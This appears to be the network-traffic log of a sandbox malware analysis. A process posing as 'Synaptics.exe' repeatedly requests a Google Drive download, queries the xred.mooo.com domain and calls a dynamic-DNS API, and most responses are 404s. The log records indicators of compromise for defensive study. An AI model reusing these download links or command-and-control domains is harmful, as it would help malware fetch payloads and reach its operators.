                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                              Source: global trafficHTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
                              Source: global trafficDNS traffic detected: DNS query: docs.google.com
                              Source: global trafficDNS traffic detected: DNS query: xred.mooo.com
                              Source: global trafficDNS traffic detected: DNS query: freedns.afraid.org
                              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5jEhBcWx3sRRM4WZuFl_r-sXa1SCE-JtoxSHHzZ_dDCkofAOrf1X5kSKU5lp7ru2-r5OIj91wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:23 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-BfyCk6bHpOewH1saaVnLVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=BBE26vPeC2hszqsXJ1ynrQW_9kLsZpsHYQPDP6eN2y2zdlFo-23O9GeRsAmPENzIlI7naznndqiKAzIJmuZItjQAXwfSAfPPnvZybJ9AaZfi_PUMO8gtrIeAc_xFc3PJOBW4tiY_9Etp3P_tRX_kZ_fi85pZ8xHBt0DyAqqJlwGZY_uPHd-1V5ba; expires=Tue, 01-Jul-2025 10:46:23 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5PqNcK1rReNjhVhnt2YfE2vXAFa4Su6ooWKO68EeyIYFcOUzZ96bepjVF7_Pgfpyvw8fBohTUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:23 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-y1gv4eopPdMqwlpUe6prDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs; expires=Tue, 01-Jul-2025 10:46:23 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7KL3WGOmHGwIlJfUTtBVGOya9N_kCo6q9qyMXNpWiNXcfDUh72JcWtvOAuSnICovmZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:24 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-QHIHeyzzJ3QW49Q7PNz5ew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=AjF33IdaeUNmHlmeyv_rklrZSnVFv8lgySmei1Dsqdy2rFxSjjfnAO-cl39aHo2JrrTKdNoIFV6ku8M9RkVKkd4wDR3j0NCN6DfoPbxsWlGAYN6sqEfJqKWWg0zy5MERV4xjBejEASTfCcn004MOi4zjgfmGet7SvpsNHYPAqhjQfvoi6GZ98aQ; expires=Tue, 01-Jul-2025 10:46:24 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Gn29z9D7JZU6RY8EDTBJ9ct_1-Ddi2pR44YfZC2hYrMVLuB34PLL_5mjRm-YdbBGQzCt50gsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:24 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-WztmJEkd3N1en903BUi2SQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg; expires=Tue, 01-Jul-2025 10:46:24 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC65GHuUhtBjlaYCUURTznVflu6pJrqucO2NsOGhBhXV859lP0SoGFuXjy-J7cIPVhcA9NyjIjQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:25 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-bh9ThQyCviSXW9TAZPP2pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7iLvb8YJnSAOAxRgJu6jit2o2nXZp4Xyq2neJoC-26-ZfsN19OKmABu3ti7riL9runContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:25 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-52CMQh1NzCaUhZ7y8Uhr2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6BihuvC21EXEIS39FTaH0fJlyF9JdWf_xS_PbyTTwFwj8NALRBrdgRphFz-hZAKJkIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:27 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-XKEdl4sY34ADx8AOdZvzfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4lRxXvKqntFmAv49Kt_DmVIJBv-cyzvu61-qlSY2NoyyDWxGmrAl7dD6TqXaJJF4jAq4R8KE8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:27 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-5Tf15NjmFzJ_KpNbum2L9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4V4EcuqXGEyBy--vxWpRD16bls4hrnar4F-wnXNfyOl-LglW7VWHeyq1uTZibe7pqeNLajpWUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:28 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-thT4M306q7AMBhXZYfMdpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4pHj7yTg57lqWyJoWRdz0WXUcltGR-Kn-KyNJuyDZlG8Us2omXWAnt7DPTftgRPnDjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:28 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-QNLp2Me4-0lJgGtoff4mhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7psqz03pYJdyF-3-vzKK6TQNaVxe4RVeja77z5QcFNFOgZn9R60PB0PEIwrXjakT9yContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:30 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-k5Qi4i2LOPmJ6iX7UQ9XCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5rZFDVBRDrnDzLfjzUqEGWebBGL4LCaCnJId78kvhzF8qbVVQZHNVMrkNIVHiIcR50MkxczG4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:30 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Qewve3RB0NYr2ccV7nWqxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4qyV9TWFqT9NnLWWOjZYA8acCeA_ddnAk_YucCUym_fP0EL2rTwoZRQTtnSJ8ZBicZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:31 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-peMrP7kaTL3aP7sXMcNaZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5lsNClKSn5db9bU27Uyje9Z6XOKQrrvv7dyL4mfiJPEOW039smoGvvtaR_2xamTH1XContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:32 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-R7Q5-sFlFXCUwa2vSh0KVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4BlNKBlY0iR8c48VlhhnGUzOzC4Qy9QSB-P5O2y7NZ2lfT2tsOcH_dgd5NGiMyatLlq0ng5vYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:32 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-hpP6T0Ritup_f1cssajd4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6dMrQDPsApcCtUzrwevCuvLGZGLQ7h8yXvstPvAW_x9-BovWjD8dnLWro_idiIVX0Zg-g-a68Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tumOFnVyVHgbKwJ9zWSZFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7INzbUNYBFIBWutVzZk2kxWKrVWj0m8vfLwFTpU9lhY6UIkWgLH9_jP_5jCTI2yAkJhiFAS7EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:46:34 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-O_5y2BxyfTnfbedJ6JuFhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
